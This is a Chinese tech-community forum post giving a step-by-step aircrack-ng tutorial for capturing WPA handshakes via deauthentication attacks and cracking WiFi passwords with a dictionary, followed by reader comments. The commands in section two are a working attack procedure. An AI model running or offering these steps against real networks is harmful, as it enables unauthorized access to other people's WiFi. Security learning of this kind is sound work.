#原创分享#如何获取WIFI密码
  

adds 4950

{{ttag.title}}

友情提示:WIFI密码的加密模式一般分为三种:WEP、WPA、WPA2。如果是WEP密码,100%可以获取到,如果是WPA或WPA2加密方式,只有8%的获取成功率。



    一、WIFI密码获取原理
    原理:就是通过获取客户端与AP(路由器)之间的验证信息,这个验证信息一般称之为握手包(Bacons包),拿密码字典去和握手包进行对比验证,对比上密码就出来了。



    二、获取过程
    1、工具
    系统(Kali或BackTrack)、一个可以供系统识别的网卡、密码字典。
    今天测试使用的是VMware Workstation搭建的Kali系统。

    2、解密过程
    a.激活USB无线网卡
    命令:ifconfig wlan0 up
    一般USB无线网卡接入Kali系统后会自动运行,无需激活。
   如果不确定是否识别到,可以通过命令:ifconfig,观察是否有wlan0这个网卡。
   

   b.更改网卡模式为监听模式
   命令:airmon-ng start wlan0
   

  敲下此命令后,wlan0的名字会更改为mon0。后续再调用无线网卡需要使用mon0。

   c.探测周遭无线情况
   命令:airodump-ng mon0
   

   上图是敲下airodump-ng mon0后出现的AP信息表。这个是动态的,会一直更新。
   关注点:BSSID列是AP的MAC地址;PWR是AP的信号强度;CH是信道;AUTH是认证方式,一般是PSK(预共享密钥)方式;ENC是加密方式;ESSID是AP的标志符。

    d.探测并抓包
    命令:airodump-ng -c 13 -w adds mon0
    解释:-c 是信道的意思。-w是写入的意思。adds是生成的文件名称。
    抓取AP信道为13的AP的数据写入到“adds”文件里。
   

   PS:这里显示信道的"CH"列下会发现非“13”数字,原因是这个有bug。有时候显示不正确。

   e.尝试获取AP与终端的交互包
   原理:对AP实现攻击,一般是Deauth攻击,也有ARP攻击,尝试捕猎完整的数据包,即包含终端握手验证包的数据包。
   命令:aireplay-ng -0 10 -a AP的MAC -c 客户端的MAC mo0
   

    f.挂载字典获取密码
    <1>由于密码字典里没有测试WIFI的密码,我们这里使用自已生成的字典。
    使用vim password.dic编辑文件,在文件里输入WIFI密码。
   
   按:wq退出,再使用cat paaaword.dic查看文件是否已经保存。
   

   最后一行是测试WIFI的正确密码。

   <2>命令:aircrack-ng -w 字典文件  捕获的cap数据包文件
    敲入:aircrack-ng -w password.dic adds-01.c
   

    输入:1,选择我们抓取数据包的AP。

   获取成功:
   

  key的比对速度平均2000个/s,由于正确的密码在字典的第10位,1秒就可以获取到。







    三、故障排查
    1、虚拟机识别不到USB无线网卡。
    a.启用VMware USB Arbitration Service服务
    路径:【开始菜单 → 运行 → services.msc】
   

    b.虚拟机设置
    勾选“自动连接新的USB设置”。
    路径:【虚拟机--设置】
   

   c.虚拟机开机后,勾选识别到的“USB无线网卡”。
   路径:虚拟机--可移动设备,勾选连接。
   

    四、参考信息   
    网上介绍这个的信息有很多,可以充分利用网络资源获取。
    1、原理及加密方式介绍
    2 、配置链接:


    友情提示:请不要利用WIFI获取隔壁妹子的果照!


   下篇:如何避免自己的路由器密码被其他人获取,链接近期奉上。

打赏鼓励作者,期待更多好文!

打赏
7人已打赏

Sangfor_闪电回_朱丽 发表于 2019-8-6 14:29
  
黑科技啊,终于知道家里的网络为啥老是被蹭了!
不过相信大家学习这个,是为了更好了做安全防护,期待下篇!
sangfor_闪电回_小六 发表于 2019-8-6 14:52
  
您好,感谢您参与社区原创分享计划2,您的文章已被收录到计划中,分享激励将在专家小组评审结束后进行派发,再次感谢!
闲吃萝卜 发表于 2019-8-8 11:28
  
学习了,期待下一篇
沧海 发表于 2019-8-8 12:15
  
很难跑出来包密码
新手756451 发表于 2019-8-8 14:47
  
感谢分享
蓝海 发表于 2019-8-8 17:29
  
感谢分享
秋水伊人 发表于 2019-8-8 17:29
  
感谢分享
朱墩2 发表于 2019-8-8 19:57
  
期待你的一个系列:奸诈:
主动出击 发表于 2019-8-14 11:20
  
你真的很牛啊。
发表新帖
热门标签
全部标签>
西北区每日一问
技术盲盒
安全效果
【 社区to talk】
技术笔记
干货满满
每日一问
信服课堂视频
新版本体验
GIF动图学习
技术咨询
功能体验
2023技术争霸赛专题
产品连连看
安装部署配置
通用技术
秒懂零信任
技术晨报
自助服务平台操作指引
原创分享
标准化排查
排障笔记本
玩转零信任
排障那些事
SDP百科
深信服技术支持平台
POC测试案例
畅聊IT
答题自测
专家问答
技术圆桌
在线直播
MVP
网络基础知识
升级
安全攻防
上网策略
测试报告
日志审计
问题分析处理
流量管理
每日一记
运维工具
云计算知识
用户认证
解决方案
sangfor周刊
VPN 对接
项目案例
SANGFOR资讯
专家分享
技术顾问
信服故事
功能咨询
终端接入
授权
设备维护
资源访问
地址转换
虚拟机
存储
迁移
加速技术
产品预警公告
信服圈儿
S豆商城资讯
技术争霸赛
「智能机器人」
追光者计划
社区帮助指南
答题榜单公布
纪元平台
卧龙计划
华北区拉练
天逸直播
以战代练
山东区技术晨报
文档捉虫活动
齐鲁TV
华北区交付直播
每周精选
2024年技术争霸赛
北京区每日一练
场景专题
故障笔记
高手请过招
升级&主动服务
高频问题集锦
社区新周刊
全能先锋系列
云化安全能力

本版达人

adds

本周建议达人

无极剑圣

本周分享达人

新手25642...

本周提问达人